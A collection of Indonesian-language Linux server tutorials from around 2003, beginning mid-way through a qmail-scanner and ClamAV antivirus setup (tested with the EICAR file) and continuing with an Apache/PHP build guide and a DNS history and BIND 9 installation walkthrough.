[root@wedus qmail-scanner-1.16]# chmod 4755 /var/qmail/bin/qmail-scanner-queue.pl

Generate database perl-scanner dan membersihkan file-file sementara :

[root@wedus qmail-scanner-1.16]# /var/qmail/bin/qmail-scanner-queue.pl -z
[root@wedus qmail-scanner-1.16]# /var/qmail/bin/qmail-scanner-queue.pl -g

Edit file /var/qmail/bin/qmail-scanner-queue.pl, sesuaikan dengan konfigurasi yang anda kehendaki, misalnya :

my $V_FROM='virus-notifier@kurowo.edu';
my $QUARANTINE_CC='asfik@indolinuxefnet.org';

Test kirim email bervirus ke root@localhost :

[root@wedus qmail-scanner-1.16]# ./contrib/test_installation.sh -doit

Jika sukses, anda bisa memodifikasi file startup untuk menjalakan qmail-smtpd anda, misalnya jika anda menggunakan supervise anda bisa mengedit file /service/qmail-smtpd/run menjadi :

PATH=$PATH:/usr/local/bin:/var/qmail/bin
QMAILQUEUE="/var/qmail/bin/qmail-scanner-queue.pl"
export PATH QMAILQUEUE

QMAILDUID=`id -u qmaild`
NOFILESGID=`id -g qmaild`
MAXSMTPD=30
exec /usr/local/bin/softlimit -m 11000000 tcpserver -H -R -v -x /etc/tcp.smtp.cdb -c "$MAXSMTPD" -u "$QMAILDUID" -g "$NOFILESGID" 0 25 qmail-smtpd 2>&1

Perhatikan perubahan tersebut diatas terutama pada path QMAILQUEUE dan angka (memory) yang digunakan softlimit, jika anda mengeset angka tersebut terlalu kecil, maka biasanya anda akan mendapatkan error perl: error in loading shared libraries: atau failed to map segment from shared object: Cannot allocate memory. Qmail-scanner tidak mendeteksi virus klez jika setting dari soflimit kurang dari 11000000 (11 juta), anda bisa lihat referensinya di http://archive.elektrapro.com/clamav.elektrapro.com/users/2002/10/msg00114.html (thanks kepada tio aka geep di #indolinux EFnet)

Restart daemon qmail anda, jika anda menggunakan supervise anda bisa menggunakan :

[root@wedus qmail-scanner-1.16]# qmailctl restart

Kemudian anda bisa mencoba mengirim email dengan attachment sebuah file eicar.com yang isinya sebagai berikut :

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Jika anda lakukan tail -f /var/spool/qmailscan/quarantine.log, maka akan anda dapatkan file tersebut akan ditolak dan di log oleh qmail-scanner, misalnya :

04/03/2003 12:31:45 asfik@indolinuxefnet.org asfik@kurowo.edu test email mengandung virus EICAR Test Virus clamscan: 0.54.

Jika sukses, berarti mail server anda telah menggunakan software antivirus :), have fun ! Jika anda menginginkan pembacaan statistik berapa jumlah email yang masuk kedalam file /var/spool/qmailscan/quarantine.log, anda bisa menggunakan Qmail Scanner Statistics (QSS). Caranya, buat direktori qss, download source qss, dan ekstrak :

[root@wedus src]# mkdir qss
[root@wedus src]# cd qss
[root@wedus qss]# wget http://unc.dl.sf.net/sourceforge/qss/qss-2.0.2.tar.gz
[root@wedus qss]# tar -xzvf qss-2.0.2.tar.gz

Tentukan direktori dimana akan kita salin file /var/spool/qmailscan/quarantine.log, misalnya buat direktori /usr/local/httpd/logs/quarantine, kemudian cari user yang menjalankan daemon apache (anda bisa melihat dari file httpd.conf anda bagian User atau anda bisa menggunakan perintah ps axu | grep httpd untuk mencarinya), disini kita misalkan usernya adalah www. Kemudian buatlah file /etc/qss.sh (mulai dibawah ini ganti user www dengan user yang menjalankan daemon apache anda) isinya :

#!/bin/bash
cp -f /var/spool/qmailscan/quarantine.log /usr/local/httpd/logs/quarantine/quarantine.log
chown www /usr/local/httpd/logs/quarantine/quarantine.log

Set menjadi script yang executable :

[root@wedus qss]# chmod +x /etc/qss.sh

Buat direktori /usr/local/httpd/logs/quarantine dan ganti kepemilikannya ke user www :

[root@wedus qss]# mkdir /usr/local/httpd/logs/quarantine
[root@wedus qss]# chown www /usr/local/httpd/logs/quarantine

Tentukan dimana qss akan diinstall, hal ini tergantung setting dari DocumentRoot di file httpd.conf anda, misalnya kita buat di direktori /usr/local/httpd/htdocs/qss (sehingga nantinya bisa diakses melalui http://localhost/qss misalnya) :

[root@wedus qss]# mkdir /usr/local/httpd/htdocs/qss

Salin semua file ke direktori tersebut diatas dan ganti kepemilikannya :

[root@wedus qss]# cp -R * /usr/local/httpd/htdocs/qss
[root@wedus qss]# chown -R www /usr/local/httpd/htdocs/qss

Edit file /usr/local/httpd/htdocs/qss/config.php ganti bagian :

$config["logFile"] = "quarantine.log";

menjadi :

$config["logFile"] = "/usr/local/httpd/logs/quarantine/quarantine.log";

Jalankan script untuk menyalin file quarantine.log untuk pertama kali :

[root@wedus qss]# sh /etc/qss.sh

Test dengan browser anda dengan url http://localhost/qss atau http://ip.address.server.anda/qss tergantung konfigurasi ServerNamepada file httpd.conf anda. Jika sukses anda bisa menambahkan cron setiap 5 menit (jika anda menginginkan waktu yang lebih lama anda bisa mengganti angka 5 menjadi yang lain, misalnya 10,15 atau 30, silakan konsultasi dengan man 5 crontab anda ) :

[root@wedus qss]# echo "*/5 * * * * /etc/qss.sh" > cron.temp
[root@wedus qss]# crontab -u root cron.temp

Enjoy !
Changelog

12 Maret 2003

Penambahan jumlah soflimit karena virus klez tidak terdeteksi oleh qmail-scanner oleh Tio (tioatkaretdotorg)

08 Maret 2003

Penambahan Qmail Scanner Statistic (QSS)

04 Maret 2003

Pembuatan tutorial antivirus di qmail menggunakan qmail-scanner dan clam antivirus dimulai
Referensi :

http://qmail-scanner.sourceforge.net
http://clamav.elektrapro.com/doc/html/

Instalasi Apache 2.0.47 (DSO+suexec)+PHP 4.3.2 (Quick and Dirty)

2005-03-07T04:47:00.000-08:00

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).

Download dan instal apache versi 2.0.47 :

[root@nablus src]# wget http://apache.secsup.org/dist/httpd/httpd-2.0.47.tar.gz
[root@nablus src]# tar -xzvf httpd-2.0.47.tar.gz
[root@nablus src]# cd httpd-2.0.47
[root@nablus httpd-2.0.47]# ./configure --prefix=/usr/local/httpd-2.0.47 \
--enable-mods-shared=all \
--enable-suexec \
--with-suexec-bin=/usr/local/httpd-2.0.47/bin/suexec \
--with-suexec-caller=www \
--with-suexec-userdir=htdocs \
--with-suexec-docroot=/ \
--with-suexec-uidmin=99 \
--with-suexec-gidmin=99 \
--with-suexec-logfile=/usr/local/httpd-2.0.47/logs/suexec_log \
--with-suexec-safepath=/usr/local/bin:/usr/bin:/bin
[root@nablus httpd-2.0.47]# make
[root@nablus httpd-2.0.47]# make install

Download dan install imap (disini imap digunakan agar --with-imap di php bisa berjalan) :

[root@nablus src]# wget ftp://ftp.cac.washington.edu/mail/imap.tar.Z
[root@nablus src]# tar -xzvf imap.tar.Z
[root@nablus src]# cd imap-2002d
[root@nablus imap-2002d]# make slx

Jika error, coba dengan perintah dibawah ini :

[root@nablus imap-2002d]# make slx SSLTYPE=none

Buat simlink :

[root@nablus imap-2002d]# ln -s c-client lib
[root@nablus imap-2002d]# ln -s c-client include

Download dan instal php versi 4.3.2 :

[root@nablus src]# wget http://us2.php.net/distributions/php-4.3.2.tar.bz2
[root@nablus src]# tar -jxvf php-4.3.2.tar.bz2
[root@nablus src]# cd php-4.3.2
[root@nablus php-4.3.2]# ./configure \
--with-apxs2=/usr/local/httpd-2.0.47/bin/apxs \
--with-config-file-path=/usr/local/httpd-2.0.47/conf \
--with-imap=../imap-2002d \
--with-jpeg-dir \
--with-ttf \
--with-ftp \
--with-gettext \
--with-dbase \
--with-filepro \
--with-zlib \
--with-xml \
--with-gdbm \
--disable-display-source \
--disable-short-tags \
--enable-track-vars \
--enable-versioning \
--enable-memory-limit
[root@nablus php-4.3.2]# make
[root@nablus php-4.3.2]# make install
[root@nablus php-4.3.2]# cp php.ini-dist /usr/local/httpd-2.0.47/conf/php.ini

Edit file /usr/local/httpd-2.0.47/conf/httpd.conf, jika diperlukan ubah pada ServerName dan ServerAdmin dan serta tambahkan :

AddType application/x-httpd-php .php
DirectoryIndex index.html index.php

Start apache :

[root@nablus asfik]# /usr/local/httpd-2.0.47/bin/apachectl start

You're done :)

Konsep DNS dan tutorial instalasi BIND

2005-03-07T04:46:00.000-08:00

Asfihani (asfik@cakraweb.com)
16 Februari 2003
Tutorial ini ditujukan untuk membantu memahami konsep dan cara kerja dari DNS (Domain Name System) serta tutorial instalasi software DNS menggunakan BIND (Berkeley Internet Name Domain). Tutorial ini mencakup instalasi BIND step by step, membuat zone dari sebuah domain beserta record-recordnya, PTR, serta mengkonfigurasi secondary DNS secara simple. BIND yang digunakan adalah versi 9.2.2rc1 (versi yang paling baru ketika tulisan ini dibuat). Tidak ada copyright apapun dalam dukumen ini, anda bebas menyalin, mencetak, maupun memodifikasi (dengan menyertakan nama penulis asli). Masih banyak kekurangan ataupun mungkin kesalahan pada tulisan ini, oleh karena itu saran, koreksi, kritik, maupun kesalahan ketik silakan dikirimkan ke email tersebut diatas. Terima Kasih.

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).
1. Pendahuluan

Setiap kali anda meggunakan internet dalam kegiatan anda sehari-hari, maka setiap kali itu pula secara tidak langsung anda menggunakan DNS (Domain Name System). Penggunaan DNS meliputi aplikasi email (electronic-mail), browsing, ssh/telnet, ftp, maupun aplikasi yang lain yang ada kaitannya dengan internet. Fungsi utama dari sebuah sistem DNS adalah menerjemahkan nama-nama host (hostnames) menjadi nomor IP (IP address) ataupun sebaliknya, sehingga nama tersebut mudah diingat oleh pengguna internet. Fungsi lainnya adalah untuk memberikan suatu informasi tentang suatu host ke seluruh jaringan internet. Sebelum kita mulai instalasi BIND kita flashback dulu dengan sejarah internet, DNS dan BIND, serta konsep DNS.
Sejarah Internet

Pada akhir tahun 1960, US. Department of Defense Advanced Research Projects Administration (ARPA/DARPA) mendanai percobaan dan riset tentang jaringan komputer secara luas yang saling menghubungkan antar hampir semua organisasi di Amerika yang akhirnya dikenal dengan sebutan ARPAnet. Hasil dari riset tersebut email (electronic-mail) mulai digunakan.

Pada awal tahun 1980 protokol TCP/IP (Transmission Control Protocol/Internet Protocol) mulai dikenalkan dan akhirnya menjadi protokol standar dalam struktur jaringan ARPAnet. Jaringan ARPAnet berkembang pesat jumlahnya menjadi ribuan host dan masih menggunakan standar protokol TCP/IP, dan akhirnya jaringan tersebut dikenal dengan internet.

Pada tahun 1988, DARPA digantikan oleh National Science Foundation (NSF) dalam pendanaan riset diikuti dengan penggantian dari ARPAnet menjadi NSFnet sebagai tulang punggung (backbone) jaringan internet. Kemudian pada musim semi tahun 1995, backbone internet melakukan transisi dari NSFnet (yang didanai oleh publik) ke beberapa backbone komersil, dimana memungkinkan interknoneksi antar jaringan bisa menjadi lebih jauh jaraknya. Penyedia backbone komersil tersebut diantaranya adalah MCI dan Sprint serta pemain lama seperti UUNet dan PSINet.

(DNS and BIND 3rd Edition, Paul Albitz & Cricket Liu, 1998 Hal 2)
Sejarah DNS

Pada tahun 1970an jaringan ARPAnet hanya terdiri dari beberapa ratus host saja. Pada waktu itu, sebuah file HOSTS.TXT yang berisi tentang semua informasi host-hosts tersebut masih bisa melayani setiap permintaan query dan menerjemahkan nama ke alamat IP (name-to-address-mapping).Pada sistem operasi berbasis UNIX, file /etc/hosts merupakan hasil dari pengolahan file HOSTS.TXT tersebut. File HOSTS.TXT pada waktu itu dikelola oleh Stanford Research Insitute Network Information Center (SRI-NIC) di Menlo Park, California. File tersebut tersebut didistribusikan ke semua host dan penggunanya hanya dengan menggunakan satu buah host (mesin/komputer) saja. Petugas administrasi dari ARPAnetbiasanya mengirimkan email kepada SRI-NIC tentang perubahan (termasuk penambahan maupun pengurangan) tentang informasi suatu host, dan dalam periode tertentu, mereka melakukan transfer file HOSTS.TXT yang paling baru (biasanya diperbaharui sekali dalam seminggu) dengan menggunakan protokol ftp. Seiring dengan berkembangnya jaringan ARPAnetdan penggunaan protokol TCP/IP, ukuran dari file HOSTS.TXT menjadi besar dengan bertambahnya jumlah host yang bergabung dengan jaringan ARPAnet. Kemudian timbul beberapa masalah dengan penggunaan file HOSTS.TXT ini, misalnya :

Trafik dan Beban (Traffic and load)

Beban mesin dan trafik (bandwith) di SRI-NIC dalam mendistribusikan file menjadi lebih berat dan besar
Penamaan yang saling bentrok (name collisions)

Pada file HOSTS.TXT tidak diperkenankan adanya dua buah nama host yang sama. Namun pada prakteknya, tidak ada cara untuk mencegah seseorang untuk menambahkan nama yang sama sehingga kemungkinan bisa menjadi bentrok dan pada akhirnya merusak skema yang telah ada
Keaslian (consistency)

Mengelola keaslian dan keutuhan sebuah file antar beberapa jaringan yang sedang berkembang pesat merupakan sesuatu hal yang sulit dilakukan

Berangkat dari masalah-masalah tersebut diatas, ARPAnet membentuk suatu sistem alternatif pengganti dari sistem lama yang menggunakan file HOSTS.TXT. Tujuannya adalah untuk memecahkan masalah dalam pengelolaan tabel host yang sangat beraneka ragam dan masih menggunakan metode sentralisasi. Pada sistem yang baru, seorang sistem administrator memungkinkan untuk mengelola data secara loka, namun akan selalu update secara global di internet. Sistem yang menggunakan metode desentralisasi ini diharapkan akan mengurangi beban dan trafik, serta pengelolaan data dan proses update dari sebuah informasi akan menjadi lebih mudah.

Paul Mockapertis dari University of Southern California Information Science Institute di Marina del Rey, California, dipilih sebagai orang yang bertanggung jawab terhadap rancangan, desain, arsitektur dan implementasi dari sistem pengelolaan data host yang baru. Pada tahun 1984 beliau merilis RFC (Request For Comment) 882 dan RFC 883 yang menjelaskan tentang Domain Name System (DNS). Kemudian disusul dengan RFC 1034 dan RFC 1035 yang juga menambahkan tentang masalah kemanan DNS, penerapan (implementasi), pengelolaan (adminstrative),mekanisme pembaharuan data secara dinamis, serta kemanan data dalam sebuah domain dan lain-lainnya.

(DNS and BIND 3rd Edition, Paul Albitz & Cricket Liu, 1998 Hal 3)
Konsep dan hirarki DNS

DNS adalah suatu bentuk database yang terdistribusi, dimana pengelolaan secara lokal terhadap suatu data akan segera diteruskan ke seluruh jaringan (internet) dengan menggunakan skema client-server. Suatu program yang dinamakan name server, mengandung semua segmen informasi dari database dan juga merupakan resolver bagi client-client yang berhubungan ataupun menggunakannya.

Struktur dari database DNS bisa diibaratkan dengan dengan struktur file dari sebuah sistem operasi UNIX. Seluruh database digambarkan sebagai sebuah struktur terbalik dari sebuah pohon (tree) dimana pada puncaknya disebut dengan root node. Pada setiap node dalam tree tersebut mempunyai keterangan (label) misalnya, .org, .com, .edu, .net, .id dan lain-lainnya, yang relatif rerhadap puncaknya (parent).Ini bisa diibaratkan dengan relative pathname pada sistem file UNIX,seperti direktori bin, usr, var, etc dan lain sebagainya. Pada puncak root node dalam sebuah sistem DNS dinotasikan dengan "." atau "/" pada sistem file UNIX.

Pada setiap node juga merupakan root dari subtree, atau pada sistem file UNIX merupakan root direktori dari sebuah direktori. Hal ini pada sistem DNS disebut dengan nama domain. Pada tiap domain juga memungkinkan nama subtree dan bisa berbeda pula, hal ini disebut subdomain atau subdirektori pada sistem file UNIX. Pada bagian subdomainjuga memungkinkan adanya subtree lagi yang bisa dikelola oleh organisasi yang berbeda dengan domain utamanya.

(DNS and BIND 3rd Edition, Paul Albitz & Cricket Liu, 1998 Hal 4)
Sejarah BIND

Program DNS yang bernama JEEVES pertama kali diimplementasikan dan ditulis sendiri oleh Paul Mockapertis. Kemudian diteruskan oleh BIND (versi 4.8.3) yang diimplementasikan pada sistem operasi 4.3 BSD UNIX yang ditulis oleh Douglas Terry, Mark Painter, David Riggle dan Songnian Zhou dari Computer Systems Research Group (CSRG) pada Universitas California di Berkeley. Pada tahun antara 1985-1987, Kevin Dunlap seseorang dari Digital Equipment Corporation (DEC) bergabung dengan CSRG yang kemudian diikuti oleh Doug Kingston, Craig Partridge, Smoot Carl- Mitchell, Mike Muuss, Jim Bloom dan Mike Schwartz. Pemimpin dari proyek ini adalah Mike Karels dan O. Kure.

BIND versi 4.9 dan 4.9.1 kemudian dirilis oleh DEC (yang sekarang diakusisi oleh Compaq Computer Corporation). Pemimpin dari proyek ini adalah Paul Vixie yang merupakan karyawan dari DEC serta dibantu oleh Phil Almquist, Robert Elz, Alan Barrett, Paul Albitz, Bryan Beecher, Andrew Partan, Andy Cherenson, Tom Limoncelli, Berthold Paffrath, Fuat Baran, Anant Kumar, Art Harkin, Win Treese, Don Lewis, Christophe Wolfhugel, dan lain-lainnya. BIND versi 4.9.2 kemudian diambil alih oleh Vixie Enterprises, dan Paul Vixie menjadi arsitek dan programmernya. BIND mulai dari versi 4.9.3 dan seterusnya kemudian diambil alih oleh Internet Software Consortium (ISC) dan akhirnya untuk pertama kalinya, pada tanggal 8 Mei 1997 Bob Halley dan Paul Vixie merilis versi BIND untuk keperluan produksi. Sekarang BINDversi 4 sudah mulai jarang digunakan, dan sebagai penggantinya adalah BIND versi 8 dan versi 9.

(http://www.isc.org/products/BIND/bind-history.html)
Cara kerja DNS

Ketika anda melakukan query (bisa berupa ping, ssh, dig, host, nslookup, email, dan lain sebagainya) ke sebuah host misalnya durmagati.ee.kurowo.edu maka name server akan memeriksa terlebih dahulu apakah ada record host tersebut di cache name server lokal. Jika tidak ada, name serverlokal akan melakukan query kepada root server dan mereferensikan name server untuk TLD .edu , name server lokal kembali melakukan query kepada name server .edu dengan jenis query yang sama dan mereferensikan kurowo.edu . Name server lokal kembali melakukan query ke name server kurowo.edu dan mereferensikan query selanjutnya ke name server lokal yaitu ee.kurowo.edu . Kemudian name server lokal melakukan query kepada name server lokal yaitu ee.kurowo.edu dan akhirnya mendapatkan jawaban address yang diminta. Penamaan host durmagati.ee.kurowo.edu mungkin bisa diartikan nama sebuah komputer (durmagati) pada Electrical Engineering Department (ee) pada Universitas Kurowo (kurowo.edu) , mungkin juga salah :)
2. Instalasi BIND

Anda bisa mendapatkan softare BIND yang paling baru dari website resmi ISC dengan alamat http://www.isc.org/products/BIND. Ketika tulisan ini dibuat versi calon rils (release candidate/rc) yang paling baru adalah 9.2.2rc1 (dirilis pada tanggal 14 Agustus 2002) dan versi stable 9.2.1 (dirilis pada tanggal 1 Mei 2002). Kebetulan mesin yang digunakan untuk percobaan adalah menggunakan sistem operasi Linux dengan distro Redhat 7.2 (Enigma), tentu anda bisa menggunakan distro favorit anda yang lain :). Karena pada distro Redhat pada instalasi default sudah menyertakan BIND dalam format RPM, maka langkah pertama adalah menghapus software tersebut dari sistem. Jika anda tidak menggunakan Redhat ataupun tidak ada software BIND yang telah ada, anda bisa melewati langkah berikut ini (INGAT, jika ada BIND yang telah jalan dan anda ingin melakukan upgrade, silakan kreatif dengan membuat salinan atau backup terlebih dahulu) :

[root@wedus asfik]# for a in $(rpm -qa | grep ^bind); do rpm -e --nodeps $a; done
[root@wedus asfik]# userdel -r named
[root@wedus asfik]# rm -rf /var/named

Diasumsikan anda terhubung ke internet dan terdapat utilitas wget untuk mendowload software dari ISC, jika anda telah mempunyai source BIND anda bisa melewati langkah berikut ini :

[root@wedus asfik]# wget ftp://ftp.isc.org/isc/bind9/9.2.2rc1/bind-9.2.2rc1.tar.gz

Kemudian kita mekarkan file source, melakukan kompilasi dan menambah user yang akan menjalakan BIND, pada proses make install akan terbentuk direktori /usr/local/named sebagai direktori utama dimana software ini disimpan :

[root@wedus asfik]# tar -xzvf bind-9.2.2rc1.tar.gz
[root@wedus asfik]# cd bind-9.2.2rc1
[root@wedus bind-9.2.2rc1]# ./configure --prefix=/usr/local/named
[root@wedus bind-9.2.2rc1]# make
[root@wedus bind-9.2.2rc1]# make install
[root@wedus bind-9.2.2rc1]# adduser -d /var/named -s /bin/false named

Ganti direktori ke home direktori user named serta mendownload file named.root yang berisi tentang informasi dari root-servers :

[root@wedus bind-9.2.2rc1]# cd /var/named
[root@wedus named]# wget ftp://internic.net/domain/named.root

Kemudian buat file untuk reverse PTR localhost (anda bisa menggunakan editor favorit anda, disini kita menggunakan vi) :

[root@wedus named]# vi db.127.0.0

Isi file db.127.0.0 adalah :

$TTL 86400
@ IN SOA localhost. root.localhost. (
2003021500 ; serial
28800 ; refresh
14400 ; retry
3600000 ; expiry
86400 ) ; minimum

IN NS localhost.
1 IN PTR localhost.

Kemudian salin file db.127.0.0 ke alamat network IP anda (bisa IP intranet atau IP yang anda dapatkan dari ISP anda), disini dimisalkan network yang akan kita reverse adalah 10.126.24.0/24 dan IP 10.126.24.1 adalah IP dimana software BIND akan kita install :

[root@wedus named]# cp db.127.0.0 db.10.126.24

Kemudian buat file yang berisi tentang zone dari localhost :

[root@wedus named]# vi db.localhost

Isi dari file db.localhost adalah :

$TTL 86400
$ORIGIN localhost.
@ IN SOA localhost. root.localhost. (
2003021500 ; serial
28800 ; refresh
14400 ; retry
3600000 ; expiry
86400 ) ; minimum

IN NS localhost.
IN A 127.0.0.1

Buat sebuah direktori untuk menyimpan file konfigurasi dari daemon program BIND :

[root@wedus named]# mkdir /usr/local/named/etc

Buat file /usr/local/named/etc/named.conf yang akan dijadikan sebagai file konfigurasi dari program BIND :

[root@wedus named]# vi /usr/local/named/etc/named.conf

Isi dari file /usr/local/named/etc/named.conf adalah :

options {
directory "/var/named";
allow-transfer { 10.126.24.2/32; };
pid-file "/var/named/named.pid";
};

logging {
category lame-servers { null; };
};

zone "." IN {
type hint;
file "named.root";
};

zone "localhost" IN {
type master;
file "db.localhost";
allow-update { none; };
};

zone "0.0.127.in-addr.arpa" IN {
type master;
file "db.127.0.0";
allow-update { none; };
};

zone "24.126.10.in-addr.arpa" IN {
type master;
file "db.10.126.24";
};

Kemudian meng-generate file konfigurasi yang akan digunakan oleh program rndc, ingat hasil dari perintah rndc-confgen bisa jadi berbeda dengan apa yang ditampilkan disini :

[root@wedus named]# /usr/local/named/sbin/rndc-confgen

Kemudian copy-paste dari hasil perintah tersebut diatas mulai dari baris "# Start of rndc.conf" sampai dengan baris "# End of rndc.conf", simpan dengan nama file /usr/local/named/etc/rndc.conf . Kemudian copy-paste lagi dengan menghilangkan tanda "#", mulai dari baris "# key "rndc-key"..." sampai dengan baris yang hampir paling bawah diatas baris "# End of named.conf " yaitu sampai dengan baris "};" kemudian tambahkan pada file /usr/local/named/etc/named.conf . Sebagai contohnya adalah sebagai berikut ini, isi dari file /usr/local/named/etc/rndc.confmisalnya :

# Start of rndc.conf
key "rndc-key" {
algorithm hmac-md5;
secret "2LCJImnMimOwc1odWR6jfg==";
};

options {
default-key "rndc-key";
default-server 127.0.0.1;
default-port 953;
};
# End of rndc.conf

Sedangkan pada file /usr/local/named/etc/named.conf ditambahkan sebagai berikut :

key "rndc-key" {
algorithm hmac-md5;
secret "2LCJImnMimOwc1odWR6jfg==";
};

controls {
inet 127.0.0.1 port 953
allow { 127.0.0.1; } keys { "rndc-key"; };
};

Atau mungkin anda bisa menggunakan trik dibawah ini (tapi mungkin tidak selalu berhasil seperti yang anda harapkan, use it at your own risk :) ) :

[root@wedus named]# /usr/local/named/sbin/rndc-confgen > confgen.tmp
[root@wedus named]# grep -v "^#" confgen.tmp > /usr/local/named/etc/rndc.conf
[root@wedus named]# grep "^#" confgen.tmp | sed 1,3d | sed -e "s/\# //g" | sed -e "s/End of named.conf//g" >> /usr/local/named/etc/named.conf
[root@wedus named]# rm -rf confgen.tmp

Kemudian langkah selanjutnya adalah mengubah kepemilikan home direktori dari user named, kemudian menjalankan daemon dari program BIND :

[root@wedus named]# chown -R named.named /var/named
[root@wedus named]# /usr/local/named/sbin/named -u named -c /usr/local/named/etc/named.conf

Jika sukses anda bisa melihat pada file /var/log/messages pesan-pesan sebagai berikut :

[root@wedus named]# tail -f /var/log/messages
Feb 15 12:54:18 wedus named[25139]: starting BIND 9.2.2rc1 -u named -c /usr/local/named/etc/named.conf
Feb 15 12:54:18 wedus named[25139]: using 1 CPU
Feb 15 12:54:18 wedus named[25139]: loading configuration from '/usr/local/named/etc/named.conf'
Feb 15 12:54:18 wedus named[25139]: no IPv6 interfaces found
Feb 15 12:54:18 wedus named[25139]: listening on IPv4 interface lo, 127.0.0.1#53
Feb 15 12:54:18 wedus named[25139]: listening on IPv4 interface eth0, 10.126.24.1#53
Feb 15 12:54:18 wedus named[25139]: command channel listening on 127.0.0.1#953
Feb 15 12:54:18 wedus named[25139]: zone 24.126.10.in-addr.arpa/IN: loaded serial 2003021500
Feb 15 12:54:18 wedus named[25139]: zone 0.0.127.in-addr.arpa/IN: loaded serial 2003021500
Feb 15 12:54:18 wedus named[25139]: zone localhost/IN: loaded serial 2003021500
Feb 15 12:54:18 wedus named[25139]: running

Untuk mengaktifkan daemon BIND setiap kali komputer direstar, tambahkan perintah "/usr/local/named/sbin/named -u named -c /usr/local/named/etc/named.conf" pada file rc.local didistro kesayangan anda. Jika anda menggunakan Redhat file rc.local terdapat pada direktori /etc, misalnya :

[root@wedus named]# echo "/usr/local/named/sbin/named -u named -c /usr/local/named/etc/named.conf" >> /etc/rc.local

Kemudian kita set resolver agar menggunakan name server localhost:

[root@wedus named]# echo "nameserver 127.0.0.1" > /etc/resolv.conf

Testing query menggunakan name server localhost dengan perintah host :

[root@wedus named]# host 127.0.0.1
1.0.0.127.in-addr.arpa domain name pointer localhost.
[root@wedus named]# host localhost
localhost has address 127.0.0.1

Atau dengan menggunakan perintah dig :

[root@wedus named]# dig -x 127.0.0.1
; <<>> DiG 9.2.2rc1 <<>> -x 127.0.0.1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64212
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;1.0.0.127.in-addr.arpa. IN PTR

;; ANSWER SECTION:
1.0.0.127.in-addr.arpa. 86400 IN PTR localhost.

;; AUTHORITY SECTION:
0.0.127.in-addr.arpa. 86400 IN NS localhost.

;; ADDITIONAL SECTION:
localhost. 86400 IN A 127.0.0.1

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Feb 15 13:58:48 2003
;; MSG SIZE rcvd: 93

Jika anda tersambung ke internet anda bisa mencoba untuk query ke suatu host misalnya :

[root@wedus named]# host www.its-sby.edu
www.its-sby.edu is an alias for ns2.its-sby.edu.
ns2.its-sby.edu has address 202.155.84.179

Anda juga bisa mengeset client anda untuk menggunakan name server yang baru saja anda konfigurasi untuk melayani query. Untuk sistem operasi Windows 2000 Server (tm) adalah sebagai berikut : klik kanan pada "My Network Places" pilih "Properties", klik kanan pada "Local Area Connection" pilih "Properties", pilih pada "Internet Protocol (TCP/IP)" klik "Properties", klik radio button pada "Use the following DNS server addresses", isikan pada "Preferred DNS server" alamat IP dimana server DNS/BIND anda tersebut diinstall, disini diumpamakan IPnya adalah 10.126.24.1 . Untuk sistem operasi Windows98 (tm) adalah : dari menu "Start" klik "Settings", klik pada "Control Panel", klik pada "Network" klik pada "TCP/IP" pilih "Properties", pilih pada tabulasi "DNS Configuration" pilih pada "Enable DNS", kemudian pada "DNS Server Search Order" isikan alamat IP dimana server DNS/BIND anda tersebut diinstall, disini diumpamakan 10.126.24.1

Sampai pada langkah ini anda telah mengkonfigurasi BIND sebagai "caching only name server" yang akan menjawab semua query DNS dan mengingat-ingat record tersebut ketika anda melakukan query pada suatu record DNS yang sama. Hal ini mungkin akan membantu anda memperpendek waktu yang anda butuhkan untuk mengqueri suatu record jika anda berada pada koneksi internet yang pas-pasan :) (misalnya dialup atau kabel modem).

Jika anda terhubung ke sebuah ISP dan ingin membagi beban querydari client anda yang menuju ke server anda dengan server DNS ISP anda, maka anda bisa menggunakan opsi forwarder. Misalkan DNS server ISP anda mempunyai IP 10.11.12.1 dan 10.11.12.2 maka di file named.confpada seksi options, bisa anda tambahkan :

forward first;
forwarders {
10.11.12.1;
10.11.12.2;
};
Menambah sebuah domain

Sebelum menambahkan sebuah zone untuk suatu domain, tentunya anda harus memiliki nama domain yang unik. Jika anda merencanakan penggunaan domain di lingkungan intranet, maka anda tidak perlu untuk membelinya ataupun menyewa IP statik dari suatu ISP. Namun jika anda juga merencanakan domain tersebut akan digunakan di internet, tentunya anda harus membeli melalui registrar-registrar yang disetujui oleh Internic dan mendapatkan IP statik dari ISP anda. Misalnya untuk top level domain (TLD) .COM/.NET/.ORG/.EDU/.BIZ/.INFO anda bisa mendaftarkan melalui Network Solutions Inc. ( http://www.nsi.com), GKG Inc. ( http://www.gkg.net), Register Inc. ( http://www.register.com), atau anda bisa melihat daftar registrar yang lengkap di website resmi Internic dengan URL http://www.internic.net/alpha.html . Atau jika anda merencanakan untuk menggunakan DTD-ID (.co.id,.or.id,.web.id,.war.net.id) anda bisa mendaftarkan melalui http://www.idnic.net.id. Setelah domain tersebut selesai anda daftarkan biasanya anda diminta mengkonfigurasi 2 buah name-server yang akan menghandle domain tersebut. Untuk TLD .COM/.NET/.ORG/.EDU/.BIZ/.INFO biasanya anda diminta untuk mendaftarkan dahulu IP statik yang akan digunakan sebagai name-server ke registrar dimana domain tersebut didaftarkan. Untuk DTD-ID sampai tulisan ini dibuat anda bisa langsung mengarahkan name-server anda ke IP statik yang anda dapatkan dari ISP tanpa perlu mendaftarkan IP tersebut.

